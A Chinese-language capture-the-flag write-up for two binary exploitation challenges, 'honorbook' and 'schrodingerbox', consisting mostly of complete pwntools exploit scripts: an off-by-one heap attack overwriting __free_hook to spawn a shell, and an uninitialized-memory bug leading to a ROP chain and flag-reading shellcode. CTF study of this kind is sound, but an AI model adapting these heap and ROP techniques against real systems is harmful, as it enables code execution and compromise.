点击此处获得更好的阅读体验
WriteUp来源
题目描述
题目考点
解题思路
CPP, Off by one, 可以覆盖结构体的最低位,导致破坏其他的结构体
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183from pwn import *
remote_addr=['',0] # 23333 for ubuntu16, 23334 for 18, 23335 for 19
#context.log_level=True
is_remote = False
elf_path = "./honorbook"
elf = ELF(elf_path)
#libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
libc = ELF("./libs/lib/libc-2.27.so")
context.terminal = ["tmux", "new-window"]
if is_remote:
p=remote(remote_addr[0],remote_addr[1])
else:
p = process(["qemu-riscv64", "-L", "./libs", elf_path], aslr = True)
ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
def lg(s,addr = None):
if addr:
print('\033[1;31;40m[+] %-15s --> 0x%8x\033[0m'%(s,addr))
else:
print('\033[1;32;40m[-] %-20s \033[0m'%(s))
def raddr(a=6):
if(a==6):
return u64(rv(a).ljust(8,'\x00'))
else:
return u64(rl().strip('\n').ljust(8,'\x00'))
def choice(idx):
sla(": ", str(idx))
def add(idx, name, msg):
choice(1)
choice(idx)
sa(": ", name)
sa(": ", msg)
def echo(filename, content, is_append = False):
sleep(1)
sn(content)
def rm(idx):
choice(2)
choice(idx)
def show(idx):
choice(3)
choice(idx)
def edit(idx, msg):
choice(4)
sa(": ", msg)
if __name__ == '__main__':
lg("libc", 0x4000aad768 - libc.symbols['_IO_2_1_stdin_'])
for i in range(11):
add(i, str(i), "AA\n")
for i in range(10):
rm(i)
choice("0"*0x500+'123')
for i in range(10):
add(i, str(i), "AA\n")
show(7)
ru(": ")
#libc_addr = raddr() - 0x3ec037 + 0x100
libc_addr = u64(rv(3).ljust(8, '\x00')) + 0x4000000000 - 0x107d37 #- libc.symbols['_IO_2_1_stdin_']
libc.address = libc_addr
lg("libc addr", libc_addr)
ru("Code")
#p.interactive()
add(21, 'BB', "CC\n")
add(22, 'BB', p64(0x21)*(0xe0/8) + '\n')
rm(21)
add(21, 'BB', "C"*0xe8 + p8(0xf0))
rm(0)
rm(1)
rm(22)
add(23, '/bin/sh\x00', p64(libc.symbols['__free_hook'])*(0xe0/8) + '\n')
add(24, 'BB', "/bin/sh\x00\n")
add(25, 'BB', p64(libc.symbols['system']) + '\n')
rm(24)
p.interactive()
schrodingerbox
exp.py
#!/usr/bin/python3
from pwn import *
p = remote('127.0.0.1', 52520)
# NOTE : This won't work if you launch it locally like p=process('./easteregg')
xchg = 0x49E61B
poprax = 0x0000000000420382
poprdi = 0x0000000000400726
poprsi = 0x000000000040167f
poprdx = 0x000000000047de66
incrax = 0x0000000000501750
poprbx = 0x00000000004072a9
syscall = 0x4C78E5
context.arch = 'amd64'
def create(type='small'):
p.sendlineafter('5.quit', '1')
p.sendlineafter('?', type)
def view(idx):
p.sendlineafter('5.quit', '4')
p.sendlineafter('?', str(idx))
for x in range(10):
create()
p.sendlineafter('5.quit', b'2-------' + p64(0x1e3fb0)[:-1]) # here is the key to take advantage of uninitialized bug
p.sendlineafter('?', '9')
dsize = 0x1e3ef0 + 1
p.sendlineafter('?', str(dsize))
p.send('x' * dsize)
view(9)
p.recvuntil('x' * dsize)
heap = (u64(p.recvuntil(' ', drop=1).ljust(8, b'\x00')) << 8) - 0x1eeab8
log.success('heap:' + hex(heap))
payload = b'\x00' * 0x20 + p64(0x00000000004488f8) # add rsp, 0x48 ; ret
payload = payload.ljust(0x58, b'\x00')
payload += p64(xchg)
payload += p64(0) * 2
# NOTE : Since our program has been "traced", execve to new shell won't work as well.:)
# ================ROP START==================
payload += p64(poprax)
payload += p64(9)
payload += p64(incrax)
payload += p64(poprdi)
payload += p64(heap & 0xfffffffffffff000)
payload += p64(poprsi)
payload += p64(0x1000)
payload += p64(poprdx)
payload += p64(7)
payload += p64(syscall)
payload += p64(heap + 0xb8) * 3
# ================ROP END====================
payload += asm(shellcraft.amd64.linux.cat('/flag')) # modify it to your flag file path
payload = payload.ljust(0x1e3ed8, b'n')
payload += p64(0x200000) # Some stuffs that I don't know :)
payload += p64(0)
payload += p64(0x3a0efff)
payload += p64(heap + 0x1eeab8)
payload += p64(0x1f5400)
payload += b'\x00' * 16
payload += p64(heap - 0x41c138)
payload = payload.ljust(0x1e3fa0, b'\x00')
payload += p64(heap) # This is actually extent_hook
p.sendlineafter('5.quit', b'2-------' + p64(0x1e3fa8)[:-1]) # here is the key to take advantage of uninitialized bug
p.sendlineafter('?', '9')
p.sendlineafter('?', str(0x1e3fa8))
p.send(payload)
# gdb.attach(p, 'b *0x4BF25A')
p.sendlineafter('5.quit', '1')
p.sendlineafter('?', 'large') # trigger shellcode
p.interactive()